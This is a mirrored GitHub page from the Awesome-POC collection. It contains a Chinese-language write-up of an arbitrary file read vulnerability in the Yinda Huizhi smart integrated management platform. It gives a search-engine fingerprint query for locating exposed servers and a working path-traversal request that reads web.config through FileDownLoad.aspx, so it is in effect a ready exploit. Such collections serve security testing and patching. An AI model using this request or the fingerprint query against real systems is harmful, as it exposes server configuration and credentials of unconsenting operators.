admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md
Threekiii 772a085cfa 更新漏洞
2023-08-28 15:55:36 +08:00

31 lines
628 B
Markdown
Raw Blame History

# 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
## 漏洞描述
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件
## 漏洞影响
```
银达汇智 智慧综合管理平台
```
## 网络测绘
```
"汇智信息" && title="智慧综合管理平台登入"
```
## 漏洞复现
登陆页面
![image-20220525150952244](./images/202205251509315.png)
验证POC
```
/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config
```
![image-20220525151256759](./images/202205251512861.png)
Reference in New Issue View Git Blame Copy Permalink